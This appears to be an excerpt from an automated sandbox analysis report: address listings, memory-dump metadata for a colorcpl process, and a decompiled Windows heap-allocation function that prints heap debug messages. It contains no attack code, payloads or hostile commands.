                                                                                                0x06e3a7d9
                                                                                                0x06e3a7e0
                                                                                                0x06e3a7e3
                                                                                                0x06e3a7ed
                                                                                                0x06e3a7f3
                                                                                                0x06e3a7f9
                                                                                                0x06e3a7ff
                                                                                                0x06e3a802
                                                                                                0x06e3a807
                                                                                                0x06e3a809
                                                                                                0x06e3a809
                                                                                                0x06e3a809
                                                                                                0x06e3a80f
                                                                                                0x06e3a80f
                                                                                                0x06e3a812
                                                                                                0x06e3a81c
                                                                                                0x06e3a821
                                                                                                0x06e3a824
                                                                                                0x06e3a42d
                                                                                                0x06e3a42d
                                                                                                0x06e3a42d
                                                                                                0x06e3a42d
                                                                                                0x06e3a42d
                                                                                                0x06e3a436
                                                                                                0x06e3a43a
                                                                                                0x06e3a609
                                                                                                0x06e3a60d
                                                                                                0x06e3a612
                                                                                                0x06e3a616
                                                                                                0x06e3a61a
                                                                                                0x06e81e57
                                                                                                0x06e81e59
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81e5f
                                                                                                0x06e3a620
                                                                                                0x06e3a627
                                                                                                0x06e81e64
                                                                                                0x06e81e66
                                                                                                0x06e81e6c
                                                                                                0x06e81e72
                                                                                                0x06e81e76
                                                                                                0x06e81e95
                                                                                                0x06e81e9a
                                                                                                0x06e81e78
                                                                                                0x06e81e8d
                                                                                                0x06e81e92
                                                                                                0x06e81ea0
                                                                                                0x06e81ea5
                                                                                                0x06e81eaa
                                                                                                0x06e81eb2
                                                                                                0x06e81eb6
                                                                                                0x06e81eb9
                                                                                                0x06e81eb9
                                                                                                0x06e81ebe
                                                                                                0x06e81ec2
                                                                                                0x06e81ec2
                                                                                                0x06e81e66
                                                                                                0x06e3a62d
                                                                                                0x06e3a633
                                                                                                0x06e3a636
                                                                                                0x06e3a63a
                                                                                                0x06e3a63c
                                                                                                0x06e3a640
                                                                                                0x06e3a642
                                                                                                0x06e3a644
                                                                                                0x06e3a644
                                                                                                0x06e3a644
                                                                                                0x06e3a64d
                                                                                                0x06e3a64d
                                                                                                0x06e3a651
                                                                                                0x06e3a655
                                                                                                0x06e81eca
                                                                                                0x06e81ed1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81ed7
                                                                                                0x00000000
                                                                                                0x06e3a65b
                                                                                                0x06e3a669
                                                                                                0x06e3a66e
                                                                                                0x06e3a670
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a676
                                                                                                0x06e3a67b
                                                                                                0x06e3a680
                                                                                                0x06e3a682
                                                                                                0x06e81f1a
                                                                                                0x06e3a688
                                                                                                0x06e3a688
                                                                                                0x06e3a688
                                                                                                0x06e3a68a
                                                                                                0x06e3a68d
                                                                                                0x06e81f24
                                                                                                0x06e81f2a
                                                                                                0x06e81f31
                                                                                                0x06e81f43
                                                                                                0x06e81f43
                                                                                                0x06e81f31
                                                                                                0x06e3a693
                                                                                                0x06e3a697
                                                                                                0x06e3a69d
                                                                                                0x06e3a6a0
                                                                                                0x06e3a6a6
                                                                                                0x06e3a6a8
                                                                                                0x06e3a6a8
                                                                                                0x06e3a6a8
                                                                                                0x06e3a6a8
                                                                                                0x06e3a6b2
                                                                                                0x06e3a6b7
                                                                                                0x06e3a6c1
                                                                                                0x06e3a6c6
                                                                                                0x06e3a6d2
                                                                                                0x06e3a6d9
                                                                                                0x06e3a6e3
                                                                                                0x06e3a6e6
                                                                                                0x06e3a6eb
                                                                                                0x06e3a6ed
                                                                                                0x06e3a6ed
                                                                                                0x06e3a6ed
                                                                                                0x06e3a6ed
                                                                                                0x06e3a6f3
                                                                                                0x06e3a6f8
                                                                                                0x06e3a702
                                                                                                0x06e3a70a
                                                                                                0x06e3a70e
                                                                                                0x06e3a71a
                                                                                                0x06e3a71e
                                                                                                0x06e81fcb
                                                                                                0x06e81fcf
                                                                                                0x06e81fdd
                                                                                                0x06e81fe3
                                                                                                0x06e81fe3
                                                                                                0x06e3a724
                                                                                                0x06e3a728
                                                                                                0x06e3a72a
                                                                                                0x06e3a72d
                                                                                                0x06e3a737
                                                                                                0x06e3a73a
                                                                                                0x06e3a73c
                                                                                                0x06e3a742
                                                                                                0x06e3a748
                                                                                                0x06e81f4d
                                                                                                0x06e81f50
                                                                                                0x06e81f56
                                                                                                0x06e81f5c
                                                                                                0x06e81f5f
                                                                                                0x06e81f7e
                                                                                                0x06e81f83
                                                                                                0x06e81f61
                                                                                                0x06e81f76
                                                                                                0x06e81f7b
                                                                                                0x06e81f89
                                                                                                0x06e81f8e
                                                                                                0x06e81f93
                                                                                                0x06e81f94
                                                                                                0x06e81f9a
                                                                                                0x06e81f9c
                                                                                                0x06e81f9e
                                                                                                0x06e81fa1
                                                                                                0x06e81fa1
                                                                                                0x06e81fa6
                                                                                                0x06e81fa6
                                                                                                0x06e81f50
                                                                                                0x06e3a74e
                                                                                                0x06e3a751
                                                                                                0x06e3a754
                                                                                                0x06e3a75d
                                                                                                0x06e3a75e
                                                                                                0x06e3a762
                                                                                                0x06e3a767
                                                                                                0x06e81faf
                                                                                                0x06e81fb0
                                                                                                0x06e81fb9
                                                                                                0x06e81fbe
                                                                                                0x06e81fc2
                                                                                                0x06e81fc2
                                                                                                0x06e3a76d
                                                                                                0x06e3a76d
                                                                                                0x06e3a775
                                                                                                0x06e3a778
                                                                                                0x06e3a77d
                                                                                                0x06e3a77d
                                                                                                0x06e3a71e
                                                                                                0x06e3a782
                                                                                                0x06e3a787
                                                                                                0x06e3a789
                                                                                                0x06e81ff3
                                                                                                0x06e3a78f
                                                                                                0x06e3a78f
                                                                                                0x06e3a78f
                                                                                                0x06e3a791
                                                                                                0x06e3a794
                                                                                                0x06e81ffd
                                                                                                0x06e82006
                                                                                                0x06e8200c
                                                                                                0x06e82017
                                                                                                0x06e82019
                                                                                                0x06e82024
                                                                                                0x06e82024
                                                                                                0x06e82024
                                                                                                0x06e82047
                                                                                                0x06e82047
                                                                                                0x06e8200c
                                                                                                0x06e3a79a
                                                                                                0x06e3a79f
                                                                                                0x06e3a7a4
                                                                                                0x06e3a7a9
                                                                                                0x06e3a7ab
                                                                                                0x06e8205a
                                                                                                0x06e3a7b1
                                                                                                0x06e3a7b1
                                                                                                0x06e3a7b1
                                                                                                0x06e3a7b3
                                                                                                0x06e3a7b6
                                                                                                0x00000000
                                                                                                0x06e3a7bc
                                                                                                0x06e82066
                                                                                                0x06e82068
                                                                                                0x06e82073
                                                                                                0x06e82073
                                                                                                0x06e82073
                                                                                                0x06e82078
                                                                                                0x06e82079
                                                                                                0x06e8207d
                                                                                                0x00000000
                                                                                                0x06e8207d
                                                                                                0x06e3a7b6
                                                                                                0x06e3a440
                                                                                                0x06e3a440
                                                                                                0x06e3a440
                                                                                                0x06e3a446
                                                                                                0x06e3a44c
                                                                                                0x06e3a44f
                                                                                                0x06e3a453
                                                                                                0x06e3a455
                                                                                                0x06e820b3
                                                                                                0x06e820b9
                                                                                                0x06e820b9
                                                                                                0x06e3a45d
                                                                                                0x06e3a460
                                                                                                0x06e3a464
                                                                                                0x06e3a466
                                                                                                0x06e3a46b
                                                                                                0x06e3a46f
                                                                                                0x06e3a471
                                                                                                0x06e3a471
                                                                                                0x06e3a471
                                                                                                0x06e3a474
                                                                                                0x06e3a479
                                                                                                0x06e3a47d
                                                                                                0x06e3a47f
                                                                                                0x06e82229
                                                                                                0x06e8222f
                                                                                                0x06e3a3c8
                                                                                                0x06e3a3c8
                                                                                                0x06e3a3ca
                                                                                                0x06e3a3ca
                                                                                                0x00000000
                                                                                                0x06e3a3ca
                                                                                                0x06e82235
                                                                                                0x06e8223a
                                                                                                0x06e8223a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82240
                                                                                                0x06e82246
                                                                                                0x06e8224a
                                                                                                0x06e82269
                                                                                                0x06e8226e
                                                                                                0x06e8224c
                                                                                                0x06e82261
                                                                                                0x06e82266
                                                                                                0x06e82274
                                                                                                0x06e82279
                                                                                                0x06e8227e
                                                                                                0x06e82286
                                                                                                0x06e82288
                                                                                                0x06e8228d
                                                                                                0x06e8228d
                                                                                                0x06e82292
                                                                                                0x06e82292
                                                                                                0x06e82295
                                                                                                0x06e82295
                                                                                                0x00000000
                                                                                                0x06e82295
                                                                                                0x06e3a485
                                                                                                0x06e3a489
                                                                                                0x06e3a48b
                                                                                                0x06e3a48f
                                                                                                0x06e3a493
                                                                                                0x06e3a497
                                                                                                0x06e3a49b
                                                                                                0x06e3a4bb
                                                                                                0x06e3a4bb
                                                                                                0x06e3a4bd
                                                                                                0x06e3a4ff
                                                                                                0x06e3a4ff
                                                                                                0x06e3a501
                                                                                                0x06e3a505
                                                                                                0x06e3a50f
                                                                                                0x06e3a517
                                                                                                0x06e3a51b
                                                                                                0x06e3a527
                                                                                                0x06e3a52b
                                                                                                0x06e82182
                                                                                                0x06e82185
                                                                                                0x06e82193
                                                                                                0x06e82199
                                                                                                0x06e82199
                                                                                                0x06e3a531
                                                                                                0x06e3a535
                                                                                                0x06e3a538
                                                                                                0x06e3a548
                                                                                                0x06e3a54b
                                                                                                0x06e3a54d
                                                                                                0x06e3a553
                                                                                                0x06e3a559
                                                                                                0x06e82100
                                                                                                0x06e82103
                                                                                                0x06e82109
                                                                                                0x06e8210f
                                                                                                0x06e82112
                                                                                                0x06e82131
                                                                                                0x06e82136
                                                                                                0x06e82114
                                                                                                0x06e82129
                                                                                                0x06e8212e
                                                                                                0x06e8213c
                                                                                                0x06e82141
                                                                                                0x06e82147
                                                                                                0x06e8214d
                                                                                                0x06e82151
                                                                                                0x06e82154
                                                                                                0x06e82154
                                                                                                0x06e82159
                                                                                                0x06e82159
                                                                                                0x06e82103
                                                                                                0x06e3a55f
                                                                                                0x06e3a562
                                                                                                0x06e3a565
                                                                                                0x06e3a567
                                                                                                0x06e82162
                                                                                                0x06e3a56d
                                                                                                0x06e3a574
                                                                                                0x06e3a575
                                                                                                0x06e3a579
                                                                                                0x06e3a57e
                                                                                                0x06e82169
                                                                                                0x06e8216a
                                                                                                0x06e82170
                                                                                                0x06e82175
                                                                                                0x06e82179
                                                                                                0x06e82179
                                                                                                0x06e3a57e
                                                                                                0x06e3a584
                                                                                                0x06e3a58f
                                                                                                0x06e3a58f
                                                                                                0x06e3a52b
                                                                                                0x06e3a5ad
                                                                                                0x06e3a5bc
                                                                                                0x06e3a5c1
                                                                                                0x06e3a5c6
                                                                                                0x06e3a5cb
                                                                                                0x06e3a5cd
                                                                                                0x06e821a9
                                                                                                0x06e3a5d3
                                                                                                0x06e3a5d3
                                                                                                0x06e3a5d3
                                                                                                0x06e3a5d5
                                                                                                0x06e3a5d8
                                                                                                0x06e821b3
                                                                                                0x06e821bc
                                                                                                0x06e821c2
                                                                                                0x06e821cd
                                                                                                0x06e821cf
                                                                                                0x06e821da
                                                                                                0x06e821da
                                                                                                0x06e821da
                                                                                                0x06e821f7
                                                                                                0x06e821f7
                                                                                                0x06e821c2
                                                                                                0x06e3a5de
                                                                                                0x06e3a5e3
                                                                                                0x06e3a5e8
                                                                                                0x06e3a5ea
                                                                                                0x06e8220a
                                                                                                0x06e3a5f0
                                                                                                0x06e3a5f0
                                                                                                0x06e3a5f0
                                                                                                0x06e3a5f2
                                                                                                0x06e3a5f5
                                                                                                0x06e82219
                                                                                                0x06e8221b
                                                                                                0x06e8208c
                                                                                                0x06e8208c
                                                                                                0x06e8208c
                                                                                                0x06e82095
                                                                                                0x06e82096
                                                                                                0x06e82097
                                                                                                0x06e82098
                                                                                                0x06e820a4
                                                                                                0x06e820a5
                                                                                                0x06e820a9
                                                                                                0x06e820a9
                                                                                                0x00000000
                                                                                                0x06e3a5f5
                                                                                                0x06e3a4bf
                                                                                                0x06e3a4d3
                                                                                                0x06e3a4d8
                                                                                                0x06e3a4da
                                                                                                0x06e81ede
                                                                                                0x06e81ede
                                                                                                0x06e81ee4
                                                                                                0x06e81ee9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81f07
                                                                                                0x00000000
                                                                                                0x06e81f07
                                                                                                0x06e3a4e0
                                                                                                0x06e3a4e5
                                                                                                0x06e3a4e7
                                                                                                0x06e820cb
                                                                                                0x06e3a4ed
                                                                                                0x06e3a4ed
                                                                                                0x06e3a4ed
                                                                                                0x06e3a4f2
                                                                                                0x06e3a4f5
                                                                                                0x06e820d5
                                                                                                0x06e820de
                                                                                                0x06e820e4
                                                                                                0x06e820f6
                                                                                                0x06e820f6
                                                                                                0x06e820e4
                                                                                                0x06e3a4fb
                                                                                                0x00000000
                                                                                                0x06e3a4fb
                                                                                                0x06e3a4a1
                                                                                                0x06e3a4a4
                                                                                                0x06e3a4a8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a4aa
                                                                                                0x06e3a4ac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a4b2
                                                                                                0x06e3a4b5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a4b5
                                                                                                0x06e3a43a
                                                                                                0x06e3a340
                                                                                                0x06e3a346
                                                                                                0x06e3a600
                                                                                                0x00000000
                                                                                                0x06e3a600
                                                                                                0x06e3a34f
                                                                                                0x06e3a351
                                                                                                0x06e3a358
                                                                                                0x06e3a3c6
                                                                                                0x00000000
                                                                                                0x06e3a371
                                                                                                0x06e3a37a
                                                                                                0x06e3a37f
                                                                                                0x06e3a382
                                                                                                0x06e3a384
                                                                                                0x06e3a394
                                                                                                0x00000000
                                                                                                0x06e3a396
                                                                                                0x06e3a399
                                                                                                0x06e3a3a7
                                                                                                0x06e3a3b0
                                                                                                0x06e3a3b4
                                                                                                0x06e3a3bb
                                                                                                0x06e3a3d2
                                                                                                0x06e3a3da
                                                                                                0x06e3a3df
                                                                                                0x06e3a3e1
                                                                                                0x06e3a3e5
                                                                                                0x06e3a3ea
                                                                                                0x06e3a3f0
                                                                                                0x06e3a3f0
                                                                                                0x06e3a3e1
                                                                                                0x00000000
                                                                                                0x06e3a3bb
                                                                                                0x06e3a394

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-523794902
                                                                                                • Opcode ID: daf1b8b6a35901073fa488b7646bf63e3f7600bf7413779434e88ce1c3fb7d45
                                                                                                • Instruction ID: 85efec34919ee8aec9f4a4dcaa379a5e05abef3f8719fdc3d80672248c1dc144
                                                                                                • Opcode Fuzzy Hash: daf1b8b6a35901073fa488b7646bf63e3f7600bf7413779434e88ce1c3fb7d45
                                                                                                • Instruction Fuzzy Hash: 764212306143819FD795DF28C888B6AB7E5FF88308F04696DE49A8B351D734D986CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06ED2D82 Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 64%
                                                                                                			E06ED2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x6ef0e80);
				E06E6D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E06E140E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E06ED30C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E06E1B150();
						} else {
							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E06E1B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E06E2EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E06ED4496(_t181, 0);
						_t177 = L06E34620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E06ED49A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E06ECFA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E06E11F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E06E416C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E06ED4496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x6f06360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x6f06364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x6f06366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E06E1B150();
								} else {
									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E06EBD455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E06E1B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E06E1B150();
								} else {
									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E06E1B150("Just allocated block at %p for %Ix bytes\n",  *0x6f06360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x6f06378 = 1;
									 *0x6f060c0 = 0;
									asm("int3");
									 *0x6f06378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x6f05708; // 0x0
					 *0x6f0b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E06E6D130(0, _t177, _t181);
				}
			}





















                                                                                                0x06ed2d82
                                                                                                0x06ed2d84
                                                                                                0x06ed2d89
                                                                                                0x06ed2d8e
                                                                                                0x06ed2d90
                                                                                                0x06ed2d92
                                                                                                0x06ed2d97
                                                                                                0x06ed2d9a
                                                                                                0x06ed2da4
                                                                                                0x06ed2dc0
                                                                                                0x06ed2dc3
                                                                                                0x06ed2dd1
                                                                                                0x06ed2dd6
                                                                                                0x06ed2dd8
                                                                                                0x06ed30a7
                                                                                                0x06ed30a7
                                                                                                0x06ed30aa
                                                                                                0x06ed30aa
                                                                                                0x06ed30ad
                                                                                                0x06ed30b4
                                                                                                0x00000000
                                                                                                0x06ed30b9
                                                                                                0x06ed2de3
                                                                                                0x06ed2de8
                                                                                                0x06ed2deb
                                                                                                0x06ed2dee
                                                                                                0x06ed2df1
                                                                                                0x06ed2df3
                                                                                                0x06ed2dfb
                                                                                                0x06ed2dfb
                                                                                                0x06ed2df5
                                                                                                0x06ed2df5
                                                                                                0x06ed2df5
                                                                                                0x06ed2e04
                                                                                                0x06ed2e0a
                                                                                                0x06ed2e0d
                                                                                                0x06ed2e11
                                                                                                0x06ed2e11
                                                                                                0x06ed2e12
                                                                                                0x06ed2e15
                                                                                                0x06ed2e18
                                                                                                0x06ed2e1a
                                                                                                0x06ed3027
                                                                                                0x06ed3027
                                                                                                0x06ed302d
                                                                                                0x06ed3030
                                                                                                0x06ed304f
                                                                                                0x06ed3054
                                                                                                0x06ed3032
                                                                                                0x06ed3047
                                                                                                0x06ed304c
                                                                                                0x06ed305a
                                                                                                0x06ed3063
                                                                                                0x00000000
                                                                                                0x06ed2e20
                                                                                                0x06ed2e20
                                                                                                0x06ed2e23
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2e29
                                                                                                0x06ed2e2b
                                                                                                0x06ed2e47
                                                                                                0x06ed2e2d
                                                                                                0x06ed2e33
                                                                                                0x06ed2e38
                                                                                                0x06ed2e3f
                                                                                                0x06ed2e42
                                                                                                0x06ed2e42
                                                                                                0x06ed2e4e
                                                                                                0x06ed2e5d
                                                                                                0x06ed2e5f
                                                                                                0x06ed2e62
                                                                                                0x06ed2e66
                                                                                                0x06ed2e6b
                                                                                                0x06ed2e6d
                                                                                                0x00000000
                                                                                                0x06ed2e73
                                                                                                0x06ed2e73
                                                                                                0x06ed2e76
                                                                                                0x06ed2e7a
                                                                                                0x06ed2e83
                                                                                                0x06ed2e83
                                                                                                0x06ed2e83
                                                                                                0x06ed2e85
                                                                                                0x06ed2e87
                                                                                                0x06ed2e8a
                                                                                                0x06ed2e8d
                                                                                                0x06ed2e92
                                                                                                0x06ed2e9c
                                                                                                0x06ed2e9f
                                                                                                0x06ed2ea1
                                                                                                0x06ed2ea2
                                                                                                0x06ed2ea6
                                                                                                0x06ed2ea6
                                                                                                0x06ed2e9f
                                                                                                0x06ed2eab
                                                                                                0x06ed2eaf
                                                                                                0x06ed2edf
                                                                                                0x06ed2ee2
                                                                                                0x06ed2ee5
                                                                                                0x06ed2eb1
                                                                                                0x06ed2eb3
                                                                                                0x06ed2eb8
                                                                                                0x06ed2ebd
                                                                                                0x06ed2ec4
                                                                                                0x06ed2ed6
                                                                                                0x06ed2ec6
                                                                                                0x06ed2ec7
                                                                                                0x06ed2ecc
                                                                                                0x06ed2ecf
                                                                                                0x06ed2ed2
                                                                                                0x06ed2ed2
                                                                                                0x06ed2ed9
                                                                                                0x06ed2ed9
                                                                                                0x06ed2ee8
                                                                                                0x06ed2eeb
                                                                                                0x06ed2eef
                                                                                                0x06ed2ef2
                                                                                                0x06ed2efe
                                                                                                0x06ed2f04
                                                                                                0x06ed2f04
                                                                                                0x06ed2f04
                                                                                                0x06ed2f06
                                                                                                0x06ed2f0d
                                                                                                0x06ed2f0f
                                                                                                0x06ed2f13
                                                                                                0x06ed2f13
                                                                                                0x06ed2f1b
                                                                                                0x06ed2f21
                                                                                                0x06ed2f27
                                                                                                0x06ed2f95
                                                                                                0x06ed2f98
                                                                                                0x06ed2f9b
                                                                                                0x06ed2fa0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2fa6
                                                                                                0x06ed2fa9
                                                                                                0x06ed2fac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2fb2
                                                                                                0x06ed2fb9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2fc3
                                                                                                0x06ed2fca
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2fd0
                                                                                                0x06ed2fd6
                                                                                                0x06ed2fd9
                                                                                                0x06ed2ff8
                                                                                                0x06ed2ffd
                                                                                                0x06ed2fdb
                                                                                                0x06ed2ff0
                                                                                                0x06ed2ff5
                                                                                                0x06ed300e
                                                                                                0x06ed300f
                                                                                                0x06ed301a
                                                                                                0x00000000
                                                                                                0x06ed2f29
                                                                                                0x06ed2f29
                                                                                                0x06ed2f2c
                                                                                                0x06ed2f4b
                                                                                                0x06ed2f50
                                                                                                0x06ed2f2e
                                                                                                0x06ed2f43
                                                                                                0x06ed2f48
                                                                                                0x06ed2f56
                                                                                                0x06ed2f64
                                                                                                0x06ed2f6c
                                                                                                0x06ed2f6c
                                                                                                0x06ed2f72
                                                                                                0x06ed2f76
                                                                                                0x06ed2f7c
                                                                                                0x06ed2f83
                                                                                                0x06ed2f89
                                                                                                0x06ed2f8a
                                                                                                0x06ed2f8a
                                                                                                0x00000000
                                                                                                0x06ed2f76
                                                                                                0x06ed2f27
                                                                                                0x06ed2e6d
                                                                                                0x06ed2da6
                                                                                                0x06ed2dab
                                                                                                0x06ed2db3
                                                                                                0x06ed2db9
                                                                                                0x06ed30bc
                                                                                                0x06ed30c1
                                                                                                0x06ed30c1

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                • API String ID: 0-1745908468
                                                                                                • Opcode ID: 9337d711e61c8b13e72fa7d5f09f9d8be2d5fb22d2c39a11737d10ab712604ae
                                                                                                • Instruction ID: d2fbb16e7aac7242c47af7ff98cde036d2f9730573b4158f55ab69e6561aff69
                                                                                                • Opcode Fuzzy Hash: 9337d711e61c8b13e72fa7d5f09f9d8be2d5fb22d2c39a11737d10ab712604ae
                                                                                                • Instruction Fuzzy Hash: 0E912531A10784DFDBE2DF68C840AADBBF2FF4A714F18A018E6559B391D7329946CB41
                                                                                                Uniqueness

